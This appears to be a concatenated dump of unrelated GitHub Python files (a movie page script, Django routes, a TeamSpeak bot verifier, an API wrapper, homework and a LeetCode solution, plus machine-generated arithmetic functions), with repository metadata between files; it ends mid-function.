| no_license | https://github.com/Yiftah/Udacity | 4b3c7346ab38162b01ff1ff96d04a6a27b12ecb6 | 58f3de75f7517e2c135dc49457d7c6c961ed0184 | refs/heads/master | 2021-01-01T19:34:29.114435 | 2015-02-06T17:33:03 | 2015-02-06T17:33:03 | 30,387,840 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import media
import fresh_tomatoes
toy_story = media.Movie("Toy Story", "A boy and his toys", "http://upload.wikimedia.org/wikipedia/en/thumb/6/69/Toy_Story_3_poster.jpg/220px-Toy_Story_3_poster.jpg", "https://www.youtube.com/watch?v=vwyZH85NQC4")
avatar = media.Movie("Avatar", "Marine on an alian planet", "http://upload.wikimedia.org/wikipedia/en/thumb/b/b0/Avatar-Teaser-Poster.jpg/220px-Avatar-Teaser-Poster.jpg", "https://www.youtube.com/watch?v=cRdxXPV9GNQ");
fresh_tomatoes.open_movies_page([toy_story, avatar])
| UTF-8 | Python | false | false | 531 | py | 1 | entertainment_center.py | 1 | 0.741996 | 0.711864 | 0 | 6 | 85.833333 | 218 |
JoaoGaBRiel-X/apitermoplus | 17,918,603,573,279 | 85eb7105403e3f13c146eebd26aafe67f1d6d14f | efde5b50f48161bf2817fdf02c2380032de68164 | /apitermoplus/urls.py | 4e2b5b9fcd108c60009bb017fc2cf450ce3a938d | []
| no_license | https://github.com/JoaoGaBRiel-X/apitermoplus | 36b9469050d8b775e6beb9db64e1e0bac9e9f3e4 | c4a9c4cd09345932bc36df6875cab5f12f2609a6 | refs/heads/main | 2023-06-12T13:19:57.749066 | 2021-07-04T19:49:41 | 2021-07-04T19:49:41 | 381,844,925 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from django.db import router
from django.urls import path, include
from rest_framework import routers
from API.views import ClientesViewSet, VeiculosViewSet, ListaPatio, EntradaViewSet
router = routers.DefaultRouter()
router.register('clientes', ClientesViewSet, basename='Clientes')
router.register('veiculos', VeiculosViewSet, basename='Veiculos')
router.register('entrada', EntradaViewSet, basename='Entrada')
router.register('patio', ListaPatio, basename='Patio')
urlpatterns = [
path('admin/', admin.site.urls),
path('', include(router.urls)),
]
| UTF-8 | Python | false | false | 594 | py | 7 | urls.py | 5 | 0.779461 | 0.779461 | 0 | 16 | 36.125 | 82 |
AxForest/teamspeak_bot | 4,200,478,033,442 | e69f031831107749902698597f88f757ebb4ffdc | c6e7a384ddcb94bdc48ae6f1ca5bfd39cb722b73 | /ts3bot/cycle.py | e8bfbc048e3574a58f375045ab2c42923c08e749 | [
"MIT"
]
| permissive | https://github.com/AxForest/teamspeak_bot | 3112235d4fe148fb9d7abfb8f55c37ae192be240 | 920a53424484798b72ffe81a6004c20ccf8ee255 | refs/heads/pre-alliances | 2023-07-23T01:13:34.932675 | 2023-07-09T12:20:28 | 2023-07-09T12:20:28 | 121,895,530 | 3 | 2 | MIT | false | 2023-02-08T05:23:27 | 2018-02-17T21:49:42 | 2022-01-05T22:51:40 | 2023-02-08T05:23:26 | 578 | 3 | 1 | 3 | Python | false | false | import datetime
import logging
from collections.abc import Iterable
from typing import Any, cast
import requests
import ts3 # type: ignore
from sqlalchemy import and_, func, or_
from sqlalchemy.orm import Session
import ts3bot
from ts3bot.bot import Bot
from ts3bot.config import env
from ts3bot.database import enums, models
class Cycle:
    """Scheduled verification run.

    Re-validates linked game accounts and TeamSpeak identities against the
    database and keeps their TS3 server groups in sync, revoking groups for
    unknown or invalidated accounts.
    """
    def __init__( # noqa: PLR0912,PLR0913
        self,
        session: Session,
        verify_all: bool,
        verify_linked_worlds: bool,
        verify_ts3: bool,
        verify_world: int | None = None,
    ):
        """Set up the cycle runner.

        :param session: open SQLAlchemy session used for all queries
        :param verify_all: force a re-check of every account regardless of age
        :param verify_linked_worlds: re-check accounts on linked worlds
        :param verify_ts3: also walk the TS3 client database
        :param verify_world: restrict checks to this world (``enums.World`` value)
        :raises Exception: if the cycle's TS3 query credentials are unset
        """
        if any(
            x is None
            for x in [env.cycle_nickname, env.cycle_username, env.cycle_password]
        ):
            raise Exception("Cycle credentials are not set correctly.")
        self.bot = Bot(session, is_cycle=True)
        self.session = session
        self.verify_all = verify_all
        self.verify_linked_worlds = verify_linked_worlds
        self.verify_ts3 = verify_ts3
        if verify_world:
            self.verify_world: enums.World | None = enums.World(verify_world)
        else:
            self.verify_world = None
        # Timestamp of this run; accounts last checked before it are candidates.
        self.verify_begin = datetime.datetime.today()
    def revoke(self, account: models.Account | None, cldbid: str) -> None:
        """Invalidate ``account`` (if given) and strip the client's synced groups.

        Whitelisted groups are left alone (``skip_whitelisted=True``).
        """
        if account:
            account.invalidate(self.session)
        changes = ts3bot.sync_groups(
            self.bot, cldbid, account, remove_all=True, skip_whitelisted=True
        )
        if len(changes["removed"]) > 0:
            logging.info(
                "Revoked user's (cldbid:%s) groups (%s).", cldbid, changes["removed"]
            )
        else:
            logging.debug("Removed no groups from user (cldbid:%s).", cldbid)
    def fix_user_guilds(self) -> None:
        """
        Removes duplicate selected guilds from users.
        No need to force-sync the user as that's done on join and in the
        following verification function.
        """
        # Accounts with more than one active guild link (should be impossible
        # unless multiple guilds are allowed).
        duplicate_guilds = (
            self.session.query(models.LinkAccountGuild)
            .filter(models.LinkAccountGuild.is_active.is_(True))
            .group_by(models.LinkAccountGuild.account_id)
            .having(func.count(models.LinkAccountGuild.guild_id) > 1)
        )
        for row in duplicate_guilds:
            logging.warning(f"{row.account} has multiple guilds.")
            # Unset duplicates
            self.session.query(models.LinkAccountGuild).filter(
                models.LinkAccountGuild.account_id == row.account_id,
                models.LinkAccountGuild.id != row.id,
            ).update({"is_active": False})
        self.session.commit()
    def run(self) -> None:
        """Entry point: run the selected verification passes, then clean up."""
        # Skip check if multiple guilds are allowed
        if not env.allow_multiple_guilds:
            self.fix_user_guilds()
        # Run if --ts3 is set or nothing was passed
        if self.verify_ts3 or not (
            self.verify_all or self.verify_linked_worlds or self.verify_world
        ):
            self.verify_ts3_accounts()
        self.verify_accounts()
        # Clean up "empty" guilds
        models.Guild.cleanup(self.session)
    def verify_ts3_accounts(self) -> None: # noqa: PLR0912
        """Walk the TS3 client database page by page and re-verify each identity.

        Clients without a known account get their groups revoked; known
        accounts are re-checked (unless recently checked) and re-synced.
        """
        if not self.bot.ts3c:
            raise ConnectionError("Not connected yet.")
        # Retrieve users
        users = self.bot.exec_("clientdblist", duration=200)
        start = 0
        while len(users) > 0:
            for counter, user in enumerate(users):
                uid = user["client_unique_identifier"]
                cldbid = user["cldbid"]
                # Skip SQ account
                if "ServerQuery" in uid:
                    continue
                # Send keepalive
                if counter % 100 == 0:
                    self.bot.ts3c.send_keepalive()
                # Get user's account
                account = models.Account.get_by_identity(self.session, uid)
                if not account:
                    self.revoke(None, cldbid)
                else:
                    # User was checked, don't check again
                    if (
                        ts3bot.timedelta_hours(
                            datetime.datetime.today() - account.last_check
                        )
                        < env.cycle_hours
                        and not self.verify_all
                    ):
                        continue
                    logging.info("Checking %s/%s", account, uid)
                    try:
                        account.update(self.session)
                        # Sync groups
                        ts3bot.sync_groups(self.bot, cldbid, account)
                    except ts3bot.InvalidKeyError:
                        # API key no longer valid: strip groups and invalidate.
                        self.revoke(account, cldbid)
                    except ts3bot.ApiErrBadDataError:
                        logging.warning(
                            "Got ErrBadData for this account after multiple attempts."
                        )
                    except requests.RequestException:
                        logging.exception("Error during API call")
                        raise
            # Skip to next user block
            start += len(users)
            try:
                users = self.bot.exec_("clientdblist", start=start, duration=200)
            except ts3.query.TS3QueryError as e:
                # Fetching users failed, most likely at end
                # (error id 1281 = empty result set — TODO confirm against TS3 docs)
                if e.args[0].error["id"] != "1281":
                    logging.exception("Error retrieving user list")
                users = []
    def verify_accounts(self) -> None:
        """
        Removes users from known groups if no account is known or the account is invalid
        """
        # Update all other accounts
        if self.verify_all:
            # Check all accounts that were not verified just now
            accounts = self.session.query(models.Account).filter(
                and_(
                    models.Account.last_check <= self.verify_begin,
                    models.Account.is_valid.is_(True),
                )
            )
        elif self.verify_linked_worlds:
            # Check all accounts which are on linked worlds, or on --world
            def or_world() -> Any:
                # Filter fragment: either on the explicitly requested world or
                # on any world flagged as linked.
                if self.verify_world:
                    return or_(
                        models.Account.world == self.verify_world,
                        models.WorldGroup.is_linked.is_(True),
                    )
                else:
                    return models.WorldGroup.is_linked.is_(True)
            accounts = (
                self.session.query(models.Account)
                .join(
                    models.WorldGroup,
                    models.Account.world == models.WorldGroup.world,
                    isouter=True,
                )
                .filter(
                    and_(
                        models.Account.last_check <= self.verify_begin,
                        or_world(),
                        models.Account.is_valid.is_(True),
                    )
                )
            )
        elif self.verify_world:
            # Only check accounts of this world
            accounts = self.session.query(models.Account).filter(
                and_(
                    models.Account.last_check
                    <= datetime.datetime.today()
                    - datetime.timedelta(hours=env.cycle_hours),
                    models.Account.is_valid.is_(True),
                    models.Account.world == self.verify_world,
                )
            )
        else:
            # Check all accounts which were not checked <x hours ago
            accounts = self.session.query(models.Account).filter(
                and_(
                    models.Account.last_check
                    <= datetime.datetime.today()
                    - datetime.timedelta(hours=env.cycle_hours),
                    models.Account.is_valid.is_(True),
                )
            )
        num_accounts = accounts.count()
        for idx, account in enumerate(cast(Iterable[models.Account], accounts)):
            if idx % 100 == 0 or idx - 1 == num_accounts:
                logging.info("%s/%s: Checking %s", idx + 1, num_accounts, account.name)
            try:
                account.update(self.session)
            except ts3bot.InvalidKeyError:
                # Nothing to do here; presumably update() flags the account and
                # the TS3 pass strips groups — TODO confirm.
                pass
            except ts3bot.ApiErrBadDataError:
                logging.warning(
                    "Got ErrBadData for this account after "
                    "multiple attempts, ignoring for now."
                )
            except requests.RequestException:
                logging.exception("Error during API call")
                raise
| UTF-8 | Python | false | false | 8,659 | py | 51 | cycle.py | 40 | 0.514494 | 0.507564 | 0 | 239 | 35.230126 | 88 |
AlexCollin/IQOption-Bot-Trade-System | 7,868,380,099,667 | 5c36652a77b3544de626f329de47d35133d10758 | 0bea4de65ef8592d81fa119f46895745e35cad99 | /src/api/iqoption/http/getactives.py | 1839aa556e8e65bff0684179a0744d3e481323ce | []
| no_license | https://github.com/AlexCollin/IQOption-Bot-Trade-System | e76135c6cabb6041fcb528ff3db8e765b6acfc33 | 6ac55810e9872231e1df08753a2e5a6bebb54d93 | refs/heads/master | 2022-07-21T19:59:29.543773 | 2022-07-14T15:15:01 | 2022-07-14T15:15:01 | 80,314,537 | 38 | 42 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""Module for IQ Option http option/init/all resource."""
from src.api.iqoption.http.resource import Resource
class GetActives(Resource):
    """Class for IQ Option API option/init/all resource."""
    # pylint: disable=too-few-public-methods
    url = "/option/init/all"
    def _get(self):
        """Send a GET request for the IQ Option API option/init/all resource.

        :returns: The instance of :class:`requests.Response`.
        """
        return self.send_http_request("GET")
    def __call__(self):
        """Fetch the IQ Option API option/init/all resource.

        :returns: The instance of :class:`requests.Response`.
        """
        return self._get()
| UTF-8 | Python | false | false | 699 | py | 57 | getactives.py | 49 | 0.629471 | 0.62804 | 0 | 25 | 26.96 | 71 |
abrarfmahendra/chapter-5-protek-abrar-farizi-m-ptikB | 1,245,540,546,882 | 6f641212158550fd9d26a60f5b1758dba0deedde | 3da3a98dcc635a83820ae3792562145e21d51292 | /chapter 5 prak 1 lat no 3.py | 2730743dd2974b7071fa232eaf875370c381d0b3 | []
| no_license | https://github.com/abrarfmahendra/chapter-5-protek-abrar-farizi-m-ptikB | 80722aaccc5d2c18c445cf5e4f55979cd4c64241 | fb2eb1abfd0b917cfa731c7c1907ae3cd53a626c | refs/heads/main | 2023-01-02T10:57:48.070281 | 2020-11-02T13:16:47 | 2020-11-02T13:16:47 | 309,373,273 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | nilai = int(input("masukan nilai indonesia = "))
nilai = int(input("masukan nilai ipa = "))
nilai = int(input("masukan nilai matematika = "))
lulus = "Selamat anda Lulus"
gagal = "maaf, Anda tidak lulus"
validasi = "input benar"
tidakvalidasi = "Maaf, input ada yang tidak valid"
if nilai>=60 :
print(lulus)
elif nilai<=60 :
print(gagal)
else :
print(gagal)
print("sebab ketidaklulusan:")
if nilai<60:
print("-Nilai bhs indonesia kurang dari 60")
if nilai<60:
print("-Nilai ipa kurang dari 60")
if nilai<70:
print("-Nilai matematika kurang dari 70")
| UTF-8 | Python | false | false | 596 | py | 14 | chapter 5 prak 1 lat no 3.py | 13 | 0.661074 | 0.634228 | 0 | 21 | 26.380952 | 50 |
Guan93/leetcode | 2,113,123,917,428 | 8e28fe58d0d3cc4078a373a7f97cbfc9dbbf3672 | 4d28c81eed7eb3f69ff2c182ab35d1ccb6364f9c | /410.split-array-largest-sum.py | db0e27d599d2da47f0b1a1c943aa2c9e35bc3921 | []
| no_license | https://github.com/Guan93/leetcode | a6e182537f71b39aa3ec4e094458b0ebc4fd536c | 14a99f506004a1167d954805179d2fa0c41c1436 | refs/heads/master | 2020-11-29T08:44:09.109348 | 2020-09-26T03:47:35 | 2020-09-26T03:47:35 | 230,072,465 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# @lc app=leetcode id=410 lang=python3
#
# [410] Split Array Largest Sum
#
# @lc code=start
# # brute force: O(C(n-1, m-1))
# class Solution:
# def splitArray(self, nums: List[int], m: int) -> int:
# self.ans = float("inf")
# n = len(nums)
# def dfs(curr_idx, curr_m, curr_max, curr_sum):
# if curr_idx == n and curr_m == m:
# self.ans = min(self.ans, curr_max)
# if curr_idx == n:
# return
# if curr_m == m:
# self.ans = min(max(curr_sum + sum(nums[curr_idx:]), curr_max), self.ans)
# else:
# if curr_idx > 0:
# dfs(curr_idx + 1, curr_m, max(curr_max, curr_sum + nums[curr_idx]), curr_sum + nums[curr_idx])
# dfs(curr_idx + 1, curr_m + 1, max(curr_max, nums[curr_idx]), nums[curr_idx])
# return
# dfs(0, 0, -float("inf"), 0)
# return self.ans
# # dp:O(mn^2) O(mn) TLE
# class Solution:
# def splitArray(self, nums: List[int], m: int) -> int:
# n = len(nums)
# dp = [[float("inf")] * (m + 1) for _ in range(n + 1)]
# dp[0][0] = 0
# cumsum = [0] * (n + 1)
# for i in range(n):
# cumsum[i + 1] = cumsum[i] + nums[i]
# for i in range(1, n + 1):
# for j in range(1, m + 1):
# for k in range(0, i):
# dp[i][j] = min(dp[i][j], max(dp[k][j - 1], cumsum[i] - cumsum[k]))
# return dp[-1][-1]
# binary search with greedy: O(nlog(sum(nums))) and O(1)
class Solution:
    def splitArray(self, nums: List[int], m: int) -> int:
        """Return the minimal possible largest subarray sum when splitting
        ``nums`` into ``m`` non-empty contiguous subarrays.

        Binary-searches the answer space [max(nums), sum(nums)]: a limit is
        feasible iff a greedy packing needs at most m subarrays.
        """
        def parts_needed(limit: int) -> int:
            # Greedily pack values into subarrays whose sums stay <= limit.
            count, running = 1, 0
            for value in nums:
                if running + value > limit:
                    count += 1
                    running = value
                else:
                    running += value
            return count
        lo, hi = max(nums), sum(nums)
        while lo < hi:
            mid = (lo + hi) // 2
            if parts_needed(mid) <= m:
                hi = mid  # feasible: try a smaller largest-sum
            else:
                lo = mid + 1  # infeasible: must allow a larger sum
        return lo
# @lc code=end
| UTF-8 | Python | false | false | 2,195 | py | 367 | 410.split-array-largest-sum.py | 367 | 0.420046 | 0.401822 | 0 | 72 | 29.486111 | 116 |
multinspired/myblog | 5,257,040,008,074 | 83b72fca780468eac33ce0dfba7db510cdc2c64f | e499cade4263b4f357aca523c030d25a28226522 | /theinspired/blog/admin.py | 53d46ef5fc40e97e8bc85611601726b228307d55 | []
| no_license | https://github.com/multinspired/myblog | 9b4184173b196ffc10929280acc0401b756f3832 | eeffb2c1a46693f843e86f94d0a3483f9d8f7b54 | refs/heads/master | 2020-06-18T03:34:04.394423 | 2019-07-10T07:12:45 | 2019-07-10T07:12:45 | 196,151,474 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from .models import Articles
from .models import QuestList
# Expose the blog models in the Django admin site (same order as before).
for blog_model in (Articles, QuestList):
    admin.site.register(blog_model)
| UTF-8 | Python | false | false | 161 | py | 12 | admin.py | 6 | 0.795031 | 0.795031 | 0 | 6 | 24.833333 | 32 |
imnnquy/algorithm-training-may-june-2020 | 764,504,198,212 | a55d382588d40004063f6173645be75e060a470c | 4c7b186abb8ab50258e0f073409881ca761dbe93 | /01-Topological Sort/05 - UVA - 11060.py | c65fe99be3a9f33cf460f3cb50433036e1c3374a | []
| no_license | https://github.com/imnnquy/algorithm-training-may-june-2020 | 3b38d9b2a6d669955f2bb21cee9af9ee0313a262 | 9118bc30c22033c6755e67624730a41ec76292fa | refs/heads/master | 2022-07-29T06:07:43.412665 | 2020-05-22T13:59:22 | 2020-05-22T13:59:22 | 261,198,268 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # https://onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&category=22&page=show_problem&problem=2001
import heapq
def kahn(graph):
    """Kahn's algorithm with a min-heap: return the lexicographically
    smallest topological order of the DAG given as adjacency lists."""
    node_count = len(graph)
    indegree = [0] * node_count
    for neighbours in graph:
        for target in neighbours:
            indegree[target] += 1
    # Seed the heap with every node that has no incoming edge.
    ready = [node for node in range(node_count) if indegree[node] == 0]
    heapq.heapify(ready)
    order = []
    while ready:
        node = heapq.heappop(ready)
        order.append(node)
        for target in graph[node]:
            indegree[target] -= 1
            if indegree[target] == 0:
                heapq.heappush(ready, target)
    return order
def solution():
counter = 1
while True:
N = 0
try:
N = int(input())
except Exception:
return
name_to_order = dict()
order_to_name = ['' for i in range(N)]
for i in range(N):
name = input().strip()
name_to_order[name] = i
order_to_name[i] = name
graph = [[] for i in range(N)]
M = int(input())
for i in range(M):
first, seccond = map(str, input().split())
graph[name_to_order[first]].append(name_to_order[seccond])
result = kahn(graph)
map_result = []
for i in range(N):
map_result.append(order_to_name[result[i]])
print(f'Case #{counter}: Dilbert should drink beverages in this order: ', end='')
print(*map_result, end='.')
counter += 1
try:
input()
except Exception:
return
print()
solution()
| UTF-8 | Python | false | false | 1,637 | py | 15 | 05 - UVA - 11060.py | 14 | 0.503971 | 0.494808 | 0 | 69 | 22.724638 | 110 |
bomb1e/gotgit | 9,371,618,659,781 | b86edd0c3e464a76f1b5346f150a6cbfe44bee19 | 7192da38b6afd3c60f80ccbecb3040cf34369ce3 | /6eac9828-3287-4eac-9bec-53387285494c.py | f7935581168072e79ba792072ca5871d997c1d87 | []
| no_license | https://github.com/bomb1e/gotgit | 6699fa9e6adb0a79f22441df41a102b09b78c2ce | 3c14cb6d1d0c4cba6a1e24a9899462d2e4bee2ce | refs/heads/master | 2020-06-12T06:00:34.695425 | 2018-08-01T02:00:02 | 2018-08-01T02:00:02 | 75,600,461 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import print_function
def func44(arg289, arg290):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Several intermediates (e.g. var309, var313, var318, var320-var322) are
    dead stores; the result depends only on var305 and var319. Kept verbatim
    on purpose — do not hand-edit.
    """
    if arg290 < arg289:
        var295 = class45()
    else:
        var295 = class47()
    for var296 in (arg290 ^ arg289 for i in [i ^ 4 for i in range(17)]):
        var295.func46(arg290, arg290)
    var300 = func49(arg289, arg290)
    var301 = func53()
    var302 = (arg290 - arg289 - var300) & arg290
    var303 = (arg289 | 828 | var300) & arg289
    var304 = (arg290 + -495 | var302) & var301
    var305 = var300 - ((var302 & var300) + var302)
    var306 = (var305 | var304) - var303 + var305
    var307 = -797 ^ var304 & arg290 - 1739820921
    var308 = -832 & (952810442 & var300 & var306)
    if var308 < arg290:
        var309 = var307 & var300
    else:
        var309 = (var306 ^ var300) - var301
    var310 = arg289 - ((arg289 ^ arg290) - -247)
    var311 = (arg289 | (var303 & var306)) | -928494540
    var312 = var300 - var303 & -500 + var304
    if var304 < var305:
        var313 = var302 - var301
    else:
        var313 = var311 ^ var310
    var314 = ((var311 | arg290) - -356) | var308
    var315 = (var310 + var312) & (var305 + var303)
    var316 = var305 | (var306 - var308) - 750923191
    var317 = var301 & (var314 - var301) ^ var305
    if var308 < var300:
        var318 = ((var304 + var308) ^ var310) - arg290
    else:
        var318 = var316 - var305 - var302
    var319 = var306 + (var317 & var316) + var315
    var320 = 657 + var317 & var310 | arg290
    var321 = var310 ^ (var303 ^ var317)
    var322 = (var319 + var317 & var305) ^ -1976770599
    result = var305 ^ var319
    return result
def func53():
    """Return 9: func51 rebinds the module-level ``len`` to ``lambda x: 9``
    before the call, and func52 deletes the override afterwards."""
    func51()
    result = len(range(29))
    func52()
    return result
def func52():
    """Remove the module-level ``len`` override installed by func51."""
    global len
    del len
def func51():
    """Shadow the builtin ``len`` with a module-global constant function."""
    global len
    len = lambda x : 9
class class47(object):
    """Generated stub strategy object; func46 discards its arguments."""
    def func46(self, arg293, arg294):
        result = 0
        return result
class class45(class47):
    """Generated stub subclass mirroring class47; also yields zero."""
    def func46(self, arg291, arg292):
        result = 0
        return result
def func34(arg196, arg197):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Calls the stateful accumulators var200/var222, so repeated calls with the
    same arguments can return different values. Kept verbatim on purpose.
    """
    var219 = var200(arg197, arg196)
    var249 = var222(arg197, arg196)
    var255 = func41(var219, arg196)
    var260 = func42(var219, arg197)
    var263 = func43(arg197, var260)
    var264 = var219 & -969
    var265 = var255 | var255 - var255 | var249
    var266 = (var265 - var260) & (var255 & var260)
    if var263 < var266:
        var267 = -356 + var266 & 1242569097 - -338299529
    else:
        var267 = ((arg197 ^ var263) - var265) | var219
    var268 = var255 + -393 + var264 - var263
    var269 = var265 & var255
    var270 = var269 + var268
    var271 = (var260 + var255 | arg197) - var249
    var272 = arg197 - var269 & arg196
    var273 = 227982549 & var271 + var260 | arg197
    var274 = (var269 | -2066898224 | 2092997037) | var272
    var275 = (arg196 & arg197 + var266) | var268
    var276 = var219 & (var264 ^ var219) | var275
    var277 = var276 + (var274 & var219)
    var278 = var219 + var249 + var255 + 939
    var279 = var268 - var260
    if var274 < var274:
        var280 = var270 + var260
    else:
        var280 = var265 & var277
    var281 = var270 + var268
    var282 = arg197 + var276
    var283 = var268 ^ var282 + var274 ^ var255
    if var281 < var265:
        var284 = (var264 - var271) + var219 ^ var275
    else:
        var284 = var281 - (var263 ^ var270 | var272)
    if var281 < var283:
        var285 = var276 ^ var275
    else:
        var285 = var260 + (var273 + var278) ^ var277
    var286 = (var273 ^ var249) ^ var283 - var276
    var287 = (var264 ^ var271) & (var219 ^ var263)
    var288 = 1325634529 + (var278 & var283 + arg197)
    result = var266 + var268 | (var272 - 340) ^ var265 ^ var282 | var275 + var270 ^ -300
    return result
def func43(arg261, arg262):
    """OR the first argument with -660; the second argument is ignored."""
    return arg261 | -660
def func42(arg256, arg257):
    """Sum 5 + i + arg257 for i in range(5); arg256 is unused."""
    return sum(5 + step + arg257 for step in range(5))
def func41(arg250, arg251):
    """Machine-generated integer arithmetic (benchmark output).

    Fix: the original also computed ``var254 = (var252 - (var253 ^ arg251)) | arg250``,
    which was never read; the dead store has been removed. The result depends
    on arg250/arg251 only through var253.
    """
    var252 = (arg250 - arg251 & arg251 + ((arg251 & (-1204783491 | arg250)) + (962 - (1720612357 & arg250 - 442)))) ^ -910
    var253 = ((((299 & (var252 + (var252 | 585))) ^ 2040105576 ^ var252 - var252 | var252 ^ (var252 - (arg250 & arg251))) + var252) | 2127017744) & -1803421046 - arg251 & (arg251 + var252 ^ arg251)
    result = arg251 ^ -497468887 ^ (arg251 + var253 - 2027291639)
    return result
def func40(arg223, arg224):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments; several intermediates are dead
    stores. Kept verbatim on purpose — do not hand-edit.
    """
    var225 = arg223 - arg224
    var226 = arg224 - -247650782 ^ -1323333970
    var227 = var225 - (var225 & var226) & arg224
    var228 = var226 + (var226 ^ (687 | var226))
    var229 = (61992347 & var225) ^ var225 | arg224
    if arg224 < var229:
        var230 = (var225 - var226) - var228 - var226
    else:
        var230 = var226 ^ var225
    var231 = var226 & arg223 ^ (var226 ^ var226)
    var232 = (var227 & var231 - arg224) | arg223
    var233 = (var226 - var226 ^ arg224) & var229
    var234 = var228 - var225 + arg223
    var235 = 320 ^ var232 ^ var233 & var231
    var236 = (2033751270 & var226) & 919
    var237 = var227 | var231 & var234 ^ var227
    var238 = (887 | (var231 + var234)) | -819189742
    var239 = var225 - var227
    var240 = var236 - var239
    var241 = 87 ^ -219 + var237
    var242 = (var226 - arg223 & var226) | var225
    var243 = (var241 ^ (var235 ^ var228)) ^ var238
    var244 = ((var226 | arg223) - -267) + var228
    var245 = (-370600548 & var233) - (var237 & var238)
    var246 = 1352369612 + var243
    var247 = var244 & var244
    var248 = (var242 + (arg224 & var233)) ^ var234
    result = (var248 ^ var247 - ((var248 | ((((var231 | var238) | arg224) & var233) | var236)) ^ var235)) ^ var242
    return result
def func39():
    """Build a stateful accumulator closure (seeded with -9) that folds
    func40 results into its running total and returns the new total."""
    closure = [-9]
    def func38(arg220, arg221):
        closure[0] += func40(arg220, arg221)
        return closure[0]
    func = func38
    return func
var222 = func39()
def func37(arg201, arg202):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments. Kept verbatim on purpose.
    """
    var203 = (-305 ^ -636781843) + -685
    var204 = (arg201 - arg201 | -266) + var203
    var205 = 248 ^ arg201
    var206 = arg202 & -1569169294 | -885 ^ -742173192
    var207 = arg201 | arg202
    var208 = (var206 & var206) & var207
    var209 = var207 | (arg201 & var206 ^ var204)
    var210 = var205 + ((var206 + var208) ^ var208)
    var211 = ((var203 + -704) - var209) | var206
    var212 = arg201 ^ var211
    var213 = 305 | var211 & var211 - var205
    var214 = (var203 ^ arg202) - var210 - -664947846
    var215 = (var204 + var212) + var213
    var216 = var212 | var211 & var212
    var217 = arg202 ^ var207 & var214 ^ var208
    var218 = var217 | ((var203 & var204) ^ arg201)
    result = -382917553 + var218
    return result
def func36():
    """Build a stateful accumulator closure (seeded with 7) that folds
    func37 results into its running total and returns the new total."""
    closure = [7]
    def func35(arg198, arg199):
        closure[0] += func37(arg198, arg199)
        return closure[0]
    func = func35
    return func
var200 = func36()
def func24(arg125, arg126):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Calls the stateful accumulator var164 and the global-``len``-patching
    func30, so it is not a pure function. Kept verbatim on purpose.
    """
    var160 = func25(arg126, arg125)
    var161 = func30()
    var182 = var164(arg125, arg126)
    if arg126 < arg126:
        var183 = arg126 ^ 992
    else:
        var183 = var161 ^ var161 ^ var161 ^ var182
    var184 = (-1239234101 + var182) + arg126 ^ var160
    var185 = var182 ^ 601
    var186 = ((var184 - var185) ^ arg126) & var184
    var187 = ((var186 - var185) | 866004316) & var160
    var188 = var186 & -631 | var187 | var187
    var189 = (-944379133 + var188) + var186 & arg125
    if var188 < var186:
        var190 = arg125 + var187 | arg126 + var185
    else:
        var190 = var186 + arg126
    var191 = var188 & (var185 & arg126 + arg125)
    if var160 < var188:
        var192 = var184 & arg125 - (-1579279711 & var187)
    else:
        var192 = (var184 | var189) & 1566365235
    var193 = (var160 ^ 377776917 - var186) ^ var185
    var194 = var193 | (var161 | var185) ^ var193
    var195 = var185 - var191 | var182 + var161
    result = var194 & (var193 ^ (var188 & var161) | (((var189 & var182 + var161 + (arg126 - var195) + -271) + 586) - arg125))
    return result
def func33(arg165, arg166):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Pure function of its two arguments. Kept verbatim on purpose.
    """
    var167 = -633 - 425754212
    var168 = arg165 ^ arg166 ^ 634
    if var168 < var168:
        var169 = var167 + 1902089246
    else:
        var169 = -509034624 - arg166
    var170 = arg166 - -1589480955 | arg165 - arg166
    var171 = var167 & arg166
    if var168 < var171:
        var172 = (var171 - var170 - var171) & arg165
    else:
        var172 = (arg165 + var167) | var167 ^ var170
    var173 = var168 + -358 - arg165 ^ var170
    if var170 < var170:
        var174 = 495 & arg165
    else:
        var174 = var173 | arg166 + var168 + -355
    var175 = arg165 - var173 - 178468486 ^ var171
    var176 = var175 & 636 - (var175 & 491709595)
    var177 = var175 & (var176 + (var171 - var175))
    var178 = var171 & var170 | (var167 + var176)
    var179 = (1435918805 & var173 - var176) ^ var177
    var180 = var171 - ((var177 | var177) ^ var179)
    if var173 < var175:
        var181 = (var175 - var177 + var176) - var168
    else:
        var181 = ((var177 | var180) & var177) - var175
    result = var178 ^ var173 ^ ((var170 | ((var167 & (var178 | var171) - var177) - var176 - var179) + var175) & var168) ^ var167
    return result
def func32():
    """Build a stateful accumulator closure (seeded with 8) that folds
    func33 results into its running total and returns the new total."""
    closure = [8]
    def func31(arg162, arg163):
        closure[0] += func33(arg162, arg163)
        return closure[0]
    func = func31
    return func
var164 = func32()
def func30():
    """Return 6: func28 rebinds the module-level ``len`` to ``lambda x: 6``
    before the call, and func29 deletes the override again."""
    func28()
    result = len(range(14))
    func29()
    return result
def func29():
    """Remove the module-level ``len`` override installed by func28."""
    global len
    del len
def func28():
    """Shadow the builtin ``len`` with a module-global constant function."""
    global len
    len = lambda x : 6
def func25(arg127, arg128):
    """Machine-generated opaque integer arithmetic (benchmark output).

    Uses two nested helpers (func26/func27) that close over the arguments.
    Kept verbatim on purpose — do not hand-edit.
    """
    def func26(arg129, arg130):
        # Generated helper: pure integer mixing of its args and the outer args.
        var131 = arg130 + arg127 + ((1032217474 - ((-442 & -627) ^ -146 | (44 | (arg129 + -2027007534) - 710 - arg129 & arg130)) + (arg127 | arg127) & (arg127 ^ (arg128 & arg130 - 1262429105))) | -778)
